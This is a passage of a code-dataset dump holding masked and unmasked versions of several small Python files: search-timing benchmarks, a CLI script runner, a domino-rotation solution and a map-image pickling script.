functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\n fn_name, fn_function, fn_list_indx = fn\n timing, _ = fn_function(rnd_list[fn_list_indx], -1)\n if amt_of_nb not in timeAggregator:\n timeAggregator[amt_of_nb] = {}\n if fn_name not in timeAggregator[amt_of_nb]:\n timeAggregator[amt_of_nb][fn_name] = 0\n timeAggregator[amt_of_nb][fn_name] += timing\n\n\ndef printTimerAggregator(timeAggregator, list_size):\n for amount_of_number, fn_type in timeAggregator.iteritems():\n print('For %s size of list:' % amount_of_number)\n for fn_name, consumedTime in fn_type.iteritems():\n print('\\t%s took %10.7f seconds to run, on average' % (fn_name,\n consumedTime / list_size))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n return time.time() - start_time, found\n\n\ndef ordered_sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n elif search_elt > elt:\n break\n return time.time() - start_time, found\n\n\ndef binary_search_iterative(my_list, search_elt):\n first = 0\n last = len(my_list) - 1\n found = False\n start_time = time.time()\n while first <= last and not found:\n midpoint = (first + last) // 2\n if my_list[midpoint] == search_elt:\n found = True\n elif search_elt < my_list[midpoint]:\n last = midpoint - 1\n else:\n first = midpoint + 1\n return time.time() - start_time, found\n\n\ndef binary_search_rec(a_list, item):\n if len(a_list) == 0:\n return False\n else:\n midpoint = len(a_list) // 2\n if a_list[midpoint] == item:\n return True\n elif item < a_list[midpoint]:\n return binary_search_rec(a_list[:midpoint], item)\n else:\n return binary_search_rec(a_list[midpoint + 1:], item)\n\n\ndef binary_search_recursive(my_list, search_elt, start_time=time.time):\n start_time = time.time()\n return time.time() - start_time, binary_search_rec(my_list, search_elt)\n\n\ndef generate_random_nb_my_list(nb, amount_my_list, maxNumber=sys.maxint):\n return [[random.randint(0, maxNumber) for _ in range(nb)] for _ in\n range(amount_my_list)]\n\n\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\n fn_name, fn_function, fn_list_indx = fn\n timing, _ = fn_function(rnd_list[fn_list_indx], -1)\n if amt_of_nb not in timeAggregator:\n timeAggregator[amt_of_nb] = {}\n if fn_name not in timeAggregator[amt_of_nb]:\n timeAggregator[amt_of_nb][fn_name] = 0\n timeAggregator[amt_of_nb][fn_name] += timing\n\n\ndef printTimerAggregator(timeAggregator, list_size):\n for amount_of_number, fn_type in timeAggregator.iteritems():\n print('For %s size of list:' % amount_of_number)\n for fn_name, consumedTime in fn_type.iteritems():\n print('\\t%s took %10.7f seconds to run, on average' % (fn_name,\n consumedTime / list_size))\n\n\nif __name__ == '__main__':\n timeAggregator = {}\n amount_of_numbers = [500, 1000, 10000]\n function_list = [('Sequential Search', sequential_search, 0), (\n 'Ordered Sequential Search', ordered_sequential_search, 1), (\n 'Binary Search Iterative', binary_search_iterative, 1), (\n 'Binary Search Recursive', binary_search_recursive, 1)]\n list_size = 100\n for amount_of_number in amount_of_numbers:\n my_randoms = generate_random_nb_my_list(amount_of_number, list_size)\n for unsorted_list in my_randoms:\n sorted_list = unsorted_list[:]\n sorted_list.sort()\n for fn in function_list:\n functionTimerAggregator(timeAggregator, fn,\n amount_of_number, (unsorted_list, sorted_list))\n printTimerAggregator(timeAggregator, list_size)\n",
"step-4": "import time\nimport random\nimport sys\n\n\ndef sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n return time.time() - start_time, found\n\n\ndef ordered_sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n elif search_elt > elt:\n break\n return time.time() - start_time, found\n\n\ndef binary_search_iterative(my_list, search_elt):\n first = 0\n last = len(my_list) - 1\n found = False\n start_time = time.time()\n while first <= last and not found:\n midpoint = (first + last) // 2\n if my_list[midpoint] == search_elt:\n found = True\n elif search_elt < my_list[midpoint]:\n last = midpoint - 1\n else:\n first = midpoint + 1\n return time.time() - start_time, found\n\n\ndef binary_search_rec(a_list, item):\n if len(a_list) == 0:\n return False\n else:\n midpoint = len(a_list) // 2\n if a_list[midpoint] == item:\n return True\n elif item < a_list[midpoint]:\n return binary_search_rec(a_list[:midpoint], item)\n else:\n return binary_search_rec(a_list[midpoint + 1:], item)\n\n\ndef binary_search_recursive(my_list, search_elt, start_time=time.time):\n start_time = time.time()\n return time.time() - start_time, binary_search_rec(my_list, search_elt)\n\n\ndef generate_random_nb_my_list(nb, amount_my_list, maxNumber=sys.maxint):\n return [[random.randint(0, maxNumber) for _ in range(nb)] for _ in\n range(amount_my_list)]\n\n\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\n fn_name, fn_function, fn_list_indx = fn\n timing, _ = fn_function(rnd_list[fn_list_indx], -1)\n if amt_of_nb not in timeAggregator:\n timeAggregator[amt_of_nb] = {}\n if fn_name not in timeAggregator[amt_of_nb]:\n timeAggregator[amt_of_nb][fn_name] = 0\n timeAggregator[amt_of_nb][fn_name] += timing\n\n\ndef printTimerAggregator(timeAggregator, list_size):\n for amount_of_number, fn_type in timeAggregator.iteritems():\n print('For %s size of list:' % amount_of_number)\n for fn_name, consumedTime in fn_type.iteritems():\n print('\\t%s took %10.7f seconds to run, on average' % (fn_name,\n consumedTime / list_size))\n\n\nif __name__ == '__main__':\n timeAggregator = {}\n amount_of_numbers = [500, 1000, 10000]\n function_list = [('Sequential Search', sequential_search, 0), (\n 'Ordered Sequential Search', ordered_sequential_search, 1), (\n 'Binary Search Iterative', binary_search_iterative, 1), (\n 'Binary Search Recursive', binary_search_recursive, 1)]\n list_size = 100\n for amount_of_number in amount_of_numbers:\n my_randoms = generate_random_nb_my_list(amount_of_number, list_size)\n for unsorted_list in my_randoms:\n sorted_list = unsorted_list[:]\n sorted_list.sort()\n for fn in function_list:\n functionTimerAggregator(timeAggregator, fn,\n amount_of_number, (unsorted_list, sorted_list))\n printTimerAggregator(timeAggregator, list_size)\n",
"step-5": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport time\r\nimport random\r\nimport sys\r\n\r\ndef sequential_search(my_list, search_elt):\r\n\tfound = False\r\n\tstart_time = time.time()\r\n\tfor elt in my_list:\r\n\t\tif search_elt == elt:\r\n\t\t\tfound = True\r\n\t\t\tbreak\r\n\treturn (time.time() - start_time), found\r\n\r\ndef ordered_sequential_search(my_list, search_elt):\r\n\tfound = False\r\n\tstart_time = time.time()\r\n\tfor elt in my_list:\r\n\t\tif search_elt == elt:\r\n\t\t\tfound = True\r\n\t\t\tbreak\r\n\t\telif search_elt > elt:\r\n\t\t\tbreak\r\n\treturn (time.time() - start_time), found\r\n\r\ndef binary_search_iterative(my_list, search_elt):\r\n\tfirst = 0\r\n\tlast = len(my_list) - 1\r\n\tfound = False\r\n\r\n\tstart_time = time.time()\r\n\twhile first <= last and not found:\r\n\t\tmidpoint = (first + last) // 2\r\n\t\tif my_list[midpoint] == search_elt:\r\n\t\t\tfound = True\r\n\t\telif search_elt < my_list[midpoint]:\r\n\t\t\tlast = midpoint - 1\r\n\t\telse:\r\n\t\t\tfirst = midpoint + 1\r\n\r\n\treturn (time.time() - start_time), found\r\n\r\ndef binary_search_rec(a_list, item):\r\n\tif len(a_list) == 0:\r\n\t\treturn False\r\n\telse:\r\n\t\tmidpoint = len(a_list) // 2\r\n\t\tif a_list[midpoint] == item:\r\n\t\t\treturn True\r\n\t\telif item < a_list[midpoint]:\r\n\t\t\treturn binary_search_rec(a_list[:midpoint], item)\r\n\t\telse:\r\n\t\t\treturn binary_search_rec(a_list[midpoint + 1:], item)\r\n\r\ndef binary_search_recursive(my_list, search_elt, start_time = time.time):\r\n\tstart_time = time.time()\r\n\treturn (time.time() - start_time), binary_search_rec(my_list, search_elt)\r\n\r\ndef generate_random_nb_my_list(nb, amount_my_list, maxNumber = sys.maxint):\r\n\treturn [\r\n\t\t[random.randint(0, maxNumber) for _ in range (nb)]\r\n\t\t\tfor _ in range (amount_my_list)\r\n\t]\r\n\r\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\r\n\t(fn_name, fn_function, fn_list_indx) = fn\r\n\t(timing, _) = fn_function(rnd_list[fn_list_indx], -1)\r\n\r\n\tif amt_of_nb not in timeAggregator:\r\n\t\ttimeAggregator[amt_of_nb] = {}\r\n\tif fn_name not in timeAggregator[amt_of_nb]:\r\n\t\ttimeAggregator[amt_of_nb][fn_name] = 0\t\r\n\ttimeAggregator[amt_of_nb][fn_name] += timing\r\n\r\ndef printTimerAggregator(timeAggregator, list_size):\r\n\tfor amount_of_number, fn_type in timeAggregator.iteritems():\r\n\t\tprint('For %s size of list:' % amount_of_number)\r\n\t\tfor fn_name, consumedTime in fn_type.iteritems():\r\n\t\t\tprint('\\t%s took %10.7f seconds to run, on average'\r\n\t\t\t\t% (fn_name, consumedTime / list_size))\r\n\r\nif __name__ == '__main__':\r\n\ttimeAggregator = {}\r\n\tamount_of_numbers = [500, 1000, 10000]\r\n\tfunction_list = [\r\n\t\t('Sequential Search', sequential_search, 0),\r\n\t\t('Ordered Sequential Search', ordered_sequential_search, 1),\r\n\t\t('Binary Search Iterative', binary_search_iterative, 1),\r\n\t\t('Binary Search Recursive', binary_search_recursive, 1),\r\n\t]\r\n\tlist_size = 100\r\n\r\n\tfor amount_of_number in amount_of_numbers:\r\n\t\tmy_randoms = generate_random_nb_my_list(amount_of_number, list_size)\r\n\t\tfor unsorted_list in my_randoms:\r\n\t\t\tsorted_list = unsorted_list[:]\r\n\t\t\tsorted_list.sort()\r\n\r\n\t\t\tfor fn in function_list:\r\n\t\t\t\tfunctionTimerAggregator(\r\n\t\t\t\t\ttimeAggregator, fn, amount_of_number,\r\n\t\t\t\t\t(unsorted_list, sorted_list))\r\n\r\n\tprintTimerAggregator(timeAggregator, list_size)\r\n\t",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@click.command()
@click.argument('command', nargs=1, required=True)
@click.pass_obj
def run(meg: Megalus, command: str) ->None:
"""Run selected script.
:param meg: Megalus instance
:param command: command/script to execute
:return: None
"""
line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,
None)
if not line_to_run:
logger.warning('Command "{}" not found in configuration file.'.
format(command))
else:
meg.run_command(line_to_run)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import click
from loguru import logger
from megalus.main import Megalus
@click.command()
@click.argument('command', nargs=1, required=True)
@click.pass_obj
def run(meg: Megalus, command: str) ->None:
"""Run selected script.
:param meg: Megalus instance
:param command: command/script to execute
:return: None
"""
line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,
None)
if not line_to_run:
logger.warning('Command "{}" not found in configuration file.'.
format(command))
else:
meg.run_command(line_to_run)
<|reserved_special_token_1|>
"""Command 'run' module."""
import click
from loguru import logger
from megalus.main import Megalus
@click.command()
@click.argument("command", nargs=1, required=True)
@click.pass_obj
def run(meg: Megalus, command: str) -> None:
"""Run selected script.
:param meg: Megalus instance
:param command: command/script to execute
:return: None
"""
line_to_run = meg.config_data["defaults"].get("scripts", {}).get(command, None)
if not line_to_run:
logger.warning('Command "{}" not found in configuration file.'.format(command))
else:
meg.run_command(line_to_run)
|
flexible
|
{
"blob_id": "23a4ca8eec50e6ab72be3f1b1077c61f676b3cce",
"index": 5777,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@click.command()\n@click.argument('command', nargs=1, required=True)\n@click.pass_obj\ndef run(meg: Megalus, command: str) ->None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,\n None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.\n format(command))\n else:\n meg.run_command(line_to_run)\n",
"step-3": "<mask token>\nimport click\nfrom loguru import logger\nfrom megalus.main import Megalus\n\n\n@click.command()\n@click.argument('command', nargs=1, required=True)\n@click.pass_obj\ndef run(meg: Megalus, command: str) ->None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,\n None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.\n format(command))\n else:\n meg.run_command(line_to_run)\n",
"step-4": "\"\"\"Command 'run' module.\"\"\"\n\nimport click\nfrom loguru import logger\n\nfrom megalus.main import Megalus\n\n\n@click.command()\n@click.argument(\"command\", nargs=1, required=True)\n@click.pass_obj\ndef run(meg: Megalus, command: str) -> None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data[\"defaults\"].get(\"scripts\", {}).get(command, None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.format(command))\n else:\n meg.run_command(line_to_run)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os, copy
from a import Moon, updateOneMoon, updateAllMoons
file_path = os.path.dirname(os.path.realpath(__file__))
input_path = file_path + "/b.in.txt"
inpt = open(input_path, 'r')
moons = []
for line in inpt:
new_moon = Moon(line)
moons.append(new_moon)
initial_moon_position = copy.deepcopy(moons)
print reduce(lambda x, y: x + y.thisIsntReallyTotalEnergy(), moons, 0)
zeros = [
[],
[],
[],
[]
]
for x in range(2780):
updateAllMoons(moons)
for i in range(len(moons)):
if moons[i].thisIsntReallyTotalEnergy() == 0:
zeros[i].append(x)
# print reduce(lambda x, y: x + y.thisIsntReallyTotalEnergy(), moons, 0)
for z in zeros:
print z
zb = []
for b in range(1, len(z)):
zb.append(z[b] - z[b-1])
print zb
za = []
for a in range(1, len(zb)):
za.append(zb[a] - zb[a-1])
print za
|
normal
|
{
"blob_id": "1f114b4716a44f5370495297511c305ecbb680c3",
"index": 7556,
"step-1": "import os, copy\nfrom a import Moon, updateOneMoon, updateAllMoons\n\nfile_path = os.path.dirname(os.path.realpath(__file__))\n\ninput_path = file_path + \"/b.in.txt\"\n\ninpt = open(input_path, 'r')\n\nmoons = []\n\nfor line in inpt:\n new_moon = Moon(line)\n moons.append(new_moon)\n\ninitial_moon_position = copy.deepcopy(moons)\n\nprint reduce(lambda x, y: x + y.thisIsntReallyTotalEnergy(), moons, 0)\n\nzeros = [\n[],\n[],\n[],\n[]\n]\n\nfor x in range(2780):\n updateAllMoons(moons)\n for i in range(len(moons)):\n if moons[i].thisIsntReallyTotalEnergy() == 0:\n zeros[i].append(x)\n # print reduce(lambda x, y: x + y.thisIsntReallyTotalEnergy(), moons, 0)\n\nfor z in zeros:\n print z\n zb = []\n for b in range(1, len(z)):\n zb.append(z[b] - z[b-1])\n print zb\n za = []\n for a in range(1, len(zb)):\n za.append(zb[a] - zb[a-1])\n print za\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from collections import Counter
class Solution:
def minDominoRotations(self, A: List[int], B: List[int]) ->int:
if not A or not B:
return 0
if len(A) != len(B):
return -1
cnt_a, cnt_b = Counter(A), Counter(B)
check_list = []
for num, freq in cnt_a.items():
check_list.append((freq, num, 'a'))
for num, freq in cnt_b.items():
check_list.append((freq, num, 'b'))
check_list.sort(reverse=True)
cnt = 0
for freq, target, lst in check_list:
if lst == 'a':
to_list, from_list = A, B
else:
to_list, from_list = B, A
invalid = False
for i in range(len(A)):
if to_list[i] == target:
continue
if from_list[i] != target:
invalid = True
break
cnt += 1
if not invalid:
return cnt
return -1
|
normal
|
{
"blob_id": "069d85370d8358aa884b5195a1b52c0014efd161",
"index": 7637,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n",
"step-4": "from collections import Counter\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
/usr/local/python-3.6/lib/python3.6/abc.py
|
normal
|
{
"blob_id": "32d830f00a9d33b8f7f438c14b522ef186001bf3",
"index": 9392,
"step-1": "/usr/local/python-3.6/lib/python3.6/abc.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import kwic
mystr = "hello world\nmy test\napples oranges"
#asseirt(kwic0.kwic(mystr) == [])
#assert(kwic1.kwic(mystr) == [mystr])
#assert(len(kwic3.kwic(mystr))==2)
assert len(kwic.kwic(mystr)) == 3
|
normal
|
{
"blob_id": "1f21fdc9a198b31bb0d5bd6dd8f46a1b3b28ec94",
"index": 6773,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nassert len(kwic.kwic(mystr)) == 3\n",
"step-3": "<mask token>\nmystr = \"\"\"hello world\nmy test\napples oranges\"\"\"\nassert len(kwic.kwic(mystr)) == 3\n",
"step-4": "import kwic\nmystr = \"\"\"hello world\nmy test\napples oranges\"\"\"\nassert len(kwic.kwic(mystr)) == 3\n",
"step-5": "import kwic\n\n\nmystr = \"hello world\\nmy test\\napples oranges\"\n#asseirt(kwic0.kwic(mystr) == [])\n#assert(kwic1.kwic(mystr) == [mystr])\n#assert(len(kwic3.kwic(mystr))==2)\nassert len(kwic.kwic(mystr)) == 3\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args
.ref) if file.endswith('.json')])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
<|reserved_special_token_0|>
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(
args.src) if file.endswith('.json')])
construct_maps(jsons)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args
.ref) if file.endswith('.json')])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
def construct_maps(jsons):
cnt = 0
ref_globals = get_reference()
for i in range(len(jsons)):
smap = simple_map.SimpleMap(jsons[i], ref_globals)
(x, y), (x_real, y_real), imgs = smap.get_route()
imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),
img)) for img in imgs]
for j in range(0, len(imgs), 10):
for k in range(3):
cnt += 1
path = os.path.join(args.dst, str(cnt))
output_file = open(path, 'wb')
obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],
'y_utm': y_real[j], 'img': imgs[j][k]}
pickle.dump(obj, output_file)
output_file.close()
print('* Video %d done, %s' % (i, jsons[i]))
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(
args.src) if file.endswith('.json')])
construct_maps(jsons)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
argparser = argparse.ArgumentParser()
argparser.add_argument('--src', type=str, required=True, help=
'source directory')
argparser.add_argument('--dst', type=str, required=True, help=
'destination directory')
argparser.add_argument('--ref', type=str, required=False, default=
'train_raw', help='global reference directory (default: train_raw)')
args = argparser.parse_args()
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args
.ref) if file.endswith('.json')])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
def construct_maps(jsons):
cnt = 0
ref_globals = get_reference()
for i in range(len(jsons)):
smap = simple_map.SimpleMap(jsons[i], ref_globals)
(x, y), (x_real, y_real), imgs = smap.get_route()
imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),
img)) for img in imgs]
for j in range(0, len(imgs), 10):
for k in range(3):
cnt += 1
path = os.path.join(args.dst, str(cnt))
output_file = open(path, 'wb')
obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],
'y_utm': y_real[j], 'img': imgs[j][k]}
pickle.dump(obj, output_file)
output_file.close()
print('* Video %d done, %s' % (i, jsons[i]))
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(
args.src) if file.endswith('.json')])
construct_maps(jsons)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import simple_map
import pickle
import os
import argparse
import cv2
argparser = argparse.ArgumentParser()
argparser.add_argument('--src', type=str, required=True, help=
'source directory')
argparser.add_argument('--dst', type=str, required=True, help=
'destination directory')
argparser.add_argument('--ref', type=str, required=False, default=
'train_raw', help='global reference directory (default: train_raw)')
args = argparser.parse_args()
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args
.ref) if file.endswith('.json')])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
def construct_maps(jsons):
cnt = 0
ref_globals = get_reference()
for i in range(len(jsons)):
smap = simple_map.SimpleMap(jsons[i], ref_globals)
(x, y), (x_real, y_real), imgs = smap.get_route()
imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),
img)) for img in imgs]
for j in range(0, len(imgs), 10):
for k in range(3):
cnt += 1
path = os.path.join(args.dst, str(cnt))
output_file = open(path, 'wb')
obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],
'y_utm': y_real[j], 'img': imgs[j][k]}
pickle.dump(obj, output_file)
output_file.close()
print('* Video %d done, %s' % (i, jsons[i]))
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(
args.src) if file.endswith('.json')])
construct_maps(jsons)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import simple_map
import pickle
import os
import argparse
import cv2
argparser = argparse.ArgumentParser()
argparser.add_argument("--src", type=str, required=True,
help="source directory")
argparser.add_argument("--dst", type=str, required=True,
help="destination directory")
argparser.add_argument("--ref", type=str, required=False, default="train_raw",
help="global reference directory (default: train_raw)")
args = argparser.parse_args()
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args.ref) if file.endswith(".json")])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
def construct_maps(jsons):
cnt = 0
# get first map as reference
ref_globals = get_reference()
for i in range(len(jsons)):
smap = simple_map.SimpleMap(jsons[i], ref_globals)
(x, y), (x_real, y_real), imgs = smap.get_route()
# resize image
imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2), img)) for img in imgs]
for j in range(0, len(imgs), 10):
for k in range(3):
cnt += 1
path = os.path.join(args.dst, str(cnt))
output_file = open(path, 'wb')
obj = {"x_steer": x[j], "y_steer": y[j],
"x_utm": x_real[j], "y_utm": y_real[j],
"img": imgs[j][k]}
pickle.dump(obj, output_file)
output_file.close()
print("* Video %d done, %s" %( i, jsons[i]))
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(args.src) if file.endswith(".json")])
construct_maps(jsons)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "a8c59f97501b3f9db30c98e334dbfcffffe7accd",
"index": 6557,
"step-1": "<mask token>\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args\n .ref) if file.endswith('.json')])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\n\n<mask token>\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(\n args.src) if file.endswith('.json')])\n construct_maps(jsons)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args\n .ref) if file.endswith('.json')])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\n\ndef construct_maps(jsons):\n cnt = 0\n ref_globals = get_reference()\n for i in range(len(jsons)):\n smap = simple_map.SimpleMap(jsons[i], ref_globals)\n (x, y), (x_real, y_real), imgs = smap.get_route()\n imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),\n img)) for img in imgs]\n for j in range(0, len(imgs), 10):\n for k in range(3):\n cnt += 1\n path = os.path.join(args.dst, str(cnt))\n output_file = open(path, 'wb')\n obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],\n 'y_utm': y_real[j], 'img': imgs[j][k]}\n pickle.dump(obj, output_file)\n output_file.close()\n print('* Video %d done, %s' % (i, jsons[i]))\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(\n args.src) if file.endswith('.json')])\n construct_maps(jsons)\n\n\n<mask token>\n",
"step-3": "<mask token>\nargparser = argparse.ArgumentParser()\nargparser.add_argument('--src', type=str, required=True, help=\n 'source directory')\nargparser.add_argument('--dst', type=str, required=True, help=\n 'destination directory')\nargparser.add_argument('--ref', type=str, required=False, default=\n 'train_raw', help='global reference directory (default: train_raw)')\nargs = argparser.parse_args()\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args\n .ref) if file.endswith('.json')])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\n\ndef construct_maps(jsons):\n cnt = 0\n ref_globals = get_reference()\n for i in range(len(jsons)):\n smap = simple_map.SimpleMap(jsons[i], ref_globals)\n (x, y), (x_real, y_real), imgs = smap.get_route()\n imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),\n img)) for img in imgs]\n for j in range(0, len(imgs), 10):\n for k in range(3):\n cnt += 1\n path = os.path.join(args.dst, str(cnt))\n output_file = open(path, 'wb')\n obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],\n 'y_utm': y_real[j], 'img': imgs[j][k]}\n pickle.dump(obj, output_file)\n output_file.close()\n print('* Video %d done, %s' % (i, jsons[i]))\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(\n args.src) if file.endswith('.json')])\n construct_maps(jsons)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import simple_map\nimport pickle\nimport os\nimport argparse\nimport cv2\nargparser = argparse.ArgumentParser()\nargparser.add_argument('--src', type=str, required=True, help=\n 'source directory')\nargparser.add_argument('--dst', type=str, required=True, help=\n 'destination directory')\nargparser.add_argument('--ref', type=str, required=False, default=\n 'train_raw', help='global reference directory (default: train_raw)')\nargs = argparser.parse_args()\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args\n .ref) if file.endswith('.json')])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\n\ndef construct_maps(jsons):\n cnt = 0\n ref_globals = get_reference()\n for i in range(len(jsons)):\n smap = simple_map.SimpleMap(jsons[i], ref_globals)\n (x, y), (x_real, y_real), imgs = smap.get_route()\n imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),\n img)) for img in imgs]\n for j in range(0, len(imgs), 10):\n for k in range(3):\n cnt += 1\n path = os.path.join(args.dst, str(cnt))\n output_file = open(path, 'wb')\n obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],\n 'y_utm': y_real[j], 'img': imgs[j][k]}\n pickle.dump(obj, output_file)\n output_file.close()\n print('* Video %d done, %s' % (i, jsons[i]))\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(\n args.src) if file.endswith('.json')])\n construct_maps(jsons)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import simple_map\nimport pickle\nimport os\nimport argparse\nimport cv2\n\nargparser = argparse.ArgumentParser()\n\nargparser.add_argument(\"--src\", type=str, required=True,\n help=\"source directory\")\nargparser.add_argument(\"--dst\", type=str, required=True,\n help=\"destination directory\")\nargparser.add_argument(\"--ref\", type=str, required=False, default=\"train_raw\", \n help=\"global reference directory (default: train_raw)\")\nargs = argparser.parse_args()\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args.ref) if file.endswith(\".json\")])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\ndef construct_maps(jsons):\n cnt = 0\n\n # get first map as reference\n ref_globals = get_reference()\n \n for i in range(len(jsons)):\n smap = simple_map.SimpleMap(jsons[i], ref_globals)\n (x, y), (x_real, y_real), imgs = smap.get_route()\n\n # resize image\n imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2), img)) for img in imgs]\n\n for j in range(0, len(imgs), 10):\n for k in range(3):\n cnt += 1\n path = os.path.join(args.dst, 